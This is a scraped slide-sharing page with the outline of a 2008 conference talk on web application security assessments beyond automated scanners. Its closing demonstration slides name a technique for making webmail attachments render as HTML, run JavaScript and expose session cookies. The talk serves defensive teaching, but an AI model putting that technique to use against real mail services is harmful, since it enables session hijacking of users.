Upload
blake101
View
813
Download
0
Embed Size (px)
DESCRIPTION
Explore the limitations of today's web scanners and see where manual web testing takes over.
Citation preview
Web Application Security Assessments:
Presented by:Blake Turrentine, [email protected]
Date:August 25, 2008
Locale: DHS Conference and Workshops,Baltimore, MD
Beyond the Automated Scanners
AUGUST 2008 2
Scanning Web 1.0 Technology
AUGUST 2008 3
Scanning Today’s Web 2.0 Technology
AUGUST 2008 4
Mashups and Web Widgets
AUGUST 2008 5
Beyond the Browser: Desktop Widgets
AUGUST 2008 6
The Security Process Threat Modeling
STRIDE
CIGITAL
CLASP
FISMA/NIST
AUGUST 2008 7
Types of Testing Techniques Black Box
White Box
Grey Box
AUGUST 2008 8
Types of Automated Scanners Static Code Analysis
Vulnerability
Web Application Specific
Fuzzers
Web Application Firewalls
AUGUST 2008 9
Fortify Source Code Analyzer
Qualys, Nessus, Saint, Foundscan
WebInspect, Cenzic, Appscan, Nikto
Mu4000, Codenomicon, Peach, Spike
Web application firewalls:
Imperva
Fortify
Mod-Security
Today’s Automated Scanners
AUGUST 2008 10
Putting too much faith in automated scanners
Their limitations – intuitiveness
Low hanging fruit
False positives and false negatives
508 Compliance / CAPTCHA
Out-maneuvering IPS and WAFS
Dangers of injecting code in production environments
Problems with Automated Scans
AUGUST 2008 11
Spidering
Complex business logic
Complex session handling
Semantics
Detecting Sensitive Data
Asynchronous dynamic code execution
Horizontal and vertical escalation
Mashups, Ajax bridges, widgets, RSS feeds
Emerging technologies such as Air and Silverlight
More Problems With Automated Scans
AUGUST 2008 12
Validation of automated scanners
Application profiling
Examining known attack vectors
Looking for compromise
Fuzzing
Approaching a Better Solution: Taking a Closer Look
AUGUST 2008 13
Application Fingerprinting
COTS
The mindset of application developers:
Server Side Code Developer
Client Side Code Developer
System Administrator (SA)
Database Administrator (DBA)
Application Profiling
AUGUST 2008 14
Catalog application, then vulnerability detection
The checklist
Examining Known Vectors
AUGUST 2008 15
Obfuscation
Lazy-Loading
Compromise
Browser/Server Security tradeoffs
Client Side: Why scanners have difficulties in handling Advance JavaScript
AUGUST 2008 16
Decompiling Bytecode / (It is not HTML)
Complex Session Management
Client Side: Why scanners can’t handle Applets
AUGUST 2008 17
Upload/download of files
Effective screening of content/control
Open boundary conditions
Embedded objects, action scripts, plug-ins, Active-X
Who’s responsible for the content supplied
Blacklists, Whitelists, Regex, selective lists
Server Side: Input/output of content is getting more complex
AUGUST 2008 18
Response Analysis
Blacklisting
Encoding tactics
Problems in dealing with Rich Internet Apps (Flash, RSS, Widgets)
Whitelisting drawbacks: bypassing Regex
Employ input and output validation with both Whitelists and Blacklists
Good input validation, poor output validation
Server Side: Scanners Lack of Filter Enumeration and Evasion
AUGUST 2008 19
XML parsing, manipulation, appending files, lack of tools
AJAX -Extended Footprint (traditional Web application with Web services)
Complexity of analysis in Web Services
AUGUST 2008 20
Inter-protocol exploitation and communication
Forced directory browsing - access control
Backend Web services
API reverse engineering
Authorization, session management, horizontal and vertical escalation, AJAX
Difficulties in Testing Application Logic
AUGUST 2008 21
XSS, SQL, Command, HTML Injection
SMTP
Browser types, versions and plug-ins, ActiveX
Server configurations
Interpretation of Error handling (database errors, stack traces)
Encoding Tactics
Attacking the Admin
Multilayer, 2nd Order Attacks, Edge Cases
Sophistication in Combining Attacks Vectors
AUGUST 2008 22
Parsing the database
Script calls
Embedded AJAX
RSS
Flash
CSRF
Active-X calls
Outbound calls
Botnets
Mastering the DOM- polymorphic JavaScript
Most Scanners Don’t Look for Infestation
CSRF
AUGUST 2008 23
Looking for Hooking Events Onload and OnFocus, eval()
Looking for user events such as, OnMouseOver
Making HTTP connections to offsite
OnKeyEvent
Asynchronous Stream Injections With Dynamic Script Execution
The Javascript Interpreter (Caffeine Monkey, SpiderMonkey) Obfuscation, whitespacing
Infestation DetectionFirewall
AUGUST 2008 24
Pros and Cons
File Fuzzing
Fuzzing APIs
HTTP Server Responses Codes
Code Paths
Difficulties in Fuzzing Analysis
AUGUST 2008 25
The machine and the human element
Machine to machine
Code maintenance
Preventing your app from becoming a part of a Botnet
SDLC process
Regression testing
Dealing with 0-day attacks
Closing Remarks
AUGUST 2008 26
Demonstration: Bypassing Defense in Depth
AUGUST 2008 27
Webmail Application Test: Combining Server & Client Attack Vectors
AUGUST 2008 28
Webmail Application Test: IE Recognizes File as a HTML
AUGUST 2008 29
Webmail Application Test: Session Cookie is Displayed
AUGUST 2008 30
GMail Web Application Test: Screenshot of Attached file
AUGUST 2008 31
GMail Web Application Test: IE Recognizes File as an HTML
AUGUST 2008 32
GMail Web Application Test: Javascript Fires
AUGUST 2008 33
Yahoo Mail Web Application Test:Creating an Email
AUGUST 2008 34
Yahoo Mail Web Application Test:Contents of ‘Instructions.doc’
AUGUST 2008 35
Yahoo Mail Web Application Test:Screenshot of Attached File
AUGUST 2008 36
Yahoo Mail Web Application Test:Norton AV Scans File Before Download
AUGUST 2008 37
Yahoo Mail Web Application Test:Javascript Fires
AUGUST 2008 38
Yahoo Mail Web Application Test:Redirection to Another Site
AUGUST 2008 39
Q u e s t i o n s ??